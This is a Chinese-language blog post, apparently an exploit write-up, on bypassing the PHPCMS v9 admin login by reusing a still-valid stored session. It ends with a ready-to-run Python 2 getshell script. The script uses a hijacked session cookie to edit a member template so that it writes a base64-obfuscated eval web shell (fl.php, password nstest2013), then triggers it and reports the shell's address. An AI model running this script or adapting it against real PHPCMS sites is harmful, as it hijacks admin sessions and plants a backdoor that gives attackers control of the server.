phpcmsv9后台登录绕过

90_

(在注入出的hash无法破解的情况下)
phpcmsv9在数据库中存储着session

1. 
   
2. <?php
   
3. return array(
   
4. //网站路径
   
5. 'web_path' => '/phpcms/install_package/',
   
6. //Session配置
   
7. 'session_storage' => 'mysql',
   
8. 'session_ttl' => 1800,
   
9. 'session_savepath' => CACHE_PATH.'sessions/',
   
10. 'session_n' => 0,
    
11. //Cookie配置
    
12. 'cookie_domain' => '', //Cookie 作用域
    
13. 'cookie_path' => '', //Cookie 作用路径
    
14. 'cookie_pre' => 'MydlE_', //Cookie 前缀，同一域名下安装多套系统时，请修改Cookie前缀
    
15. 'cookie_ttl' => 0, //Cookie 生命周期，0 表示随浏览器进程
    
16. //模板相关配置
    
17. 'tpl_root' => 'templates/', //模板保存物理路径
    
18. 'tpl_name' => 'default', //当前模板方案目录
    
19. 'tpl_css' => 'default', //当前样式目录
    
20. 'tpl_referesh' => 1,
    
21. 'tpl_edit'=>1,//是否允许在线编辑模板

复制代码

默认是mysql方式存储，session的有效期默认为30分钟。
/phpcms/libs/classes/session_mysql.class.php
查看源代码打印帮助

1. 
   
2.     public function __construct() {
   
3.                 $this->db = pc_base::load_model('session_model');
   
4.                 $this->lifetime = pc_base::load_config('system','session_ttl');
   
5.             session_set_save_handler(array(&$this,'open'), array(&$this,'close'), array(&$this,'read'), array(&$this,'write'), array(&$this,'destroy'), array(&$this,'gc'));
   
6.             session_start();
   
7.     }
   
8. …….
   
9.     public function destroy($id) {
   
10.                 return $this->db->delete(array('sessionid'=>$id));
    
11.     }
    
12. /**
    
13. * 删除过期的 session
    
14. *
    
15. * @param $maxlifetime 存活期时间
    
16. * @return bool
    
17. */
    
18.    public function gc($maxlifetime) {
    
19.                 $expiretime = SYS_TIME - $maxlifetime;
    
20.                 return $this->db->delete("`lastvisit`<$expiretime");
    
21.     }
    
22. }

复制代码

这里只要触发了gc session就会被更新，如果超时了就删除。
来看看哪里会触发gc
/phpcms/modules/member/index.php

1. 
   
2. private function _session_start() {
   
3.         $session_storage = 'session_'.pc_base::load_config('system','session_storage');
   
4.         pc_base::load_sys_class($session_storage);
   
5. }

复制代码

前台注册 登录 后台登录都会触发gc操作。所以如果管理没有注销的情况，没人访问触发这些操作的情况下，就算过了半小时，session也不会消失，任然能拿shell。如果session无效，可以通过脚本20分钟监测一次，看是否有效，然后getshell。
Python写的getshell的脚本

1. 
   
2. #! /usr/bin/env python
   
3. import urllib2,re
   
4. #code by 花开、若相惜
   
5. #PaxMac Team
   
6. url=raw_input('input your attack url: ')
   
7. CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here
   
8. response = urllib2.Request(url+'/index.php?m=admin')
   
9. response.add_header('Cookie',CmsCookie)
   
10. response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    
11. attck = urllib2.urlopen(response)
    
12. #print attck.read()
    
13. pattern = re.compile('pc_hash=\w{6}', re.I)  
    
14. match = pattern.search(attck.read())
    
15. if match:
    
16.     hashkey=match.group()
    
17.     print "I Got pc_hash :"+hashkey
    
18. attck.close()
    
19. print "Start getshell..."
    
20. data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+\
    
21. %27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22\
    
22. col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+\
    
23. class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+\
    
24. method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+\
    
25. value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+\
    
26. class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D\
    
27. +%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A\
    
28. select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24\
    
29. type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22\
    
30. dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++\
    
31. class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++\
    
32. %3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++\
    
33. %3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A\
    
34. ++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++\
    
35. %3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C\
    
36. %2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+\
    
37. width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F\
    
38. if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A\
    
39. ++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+\
    
40. class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F\
    
41. div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey
    
42. response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data)
    
43. response.add_header('Cookie',CmsCookie)
    
44. response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    
45. attck = urllib2.urlopen(response)
    
46. #print attck.read()
    
47. attck.close()
    
48. response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)
    
49. response.add_header('Cookie',CmsCookie)
    
50. response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    
51. attck = urllib2.urlopen(response)
    
52. attck.close()
    
53. try:
    
54.     response = urllib2.Request(url+'/fl.php')
    
55.     response.add_header('Cookie',CmsCookie)
    
56.     response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    
57.     attck = urllib2.urlopen(response)
    
58.     if str(attck.read())=="1":
    
59.         print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"
    
60.     else:
    
61.         print "Failed!"
    
62.     attck.close()
    
63. except urllib2.HTTPError, e:
    
64. print e.code
    

复制代码

作者：花开、若相惜
博主提醒：此Exp需要更改cookies，注册会员时需自行抓包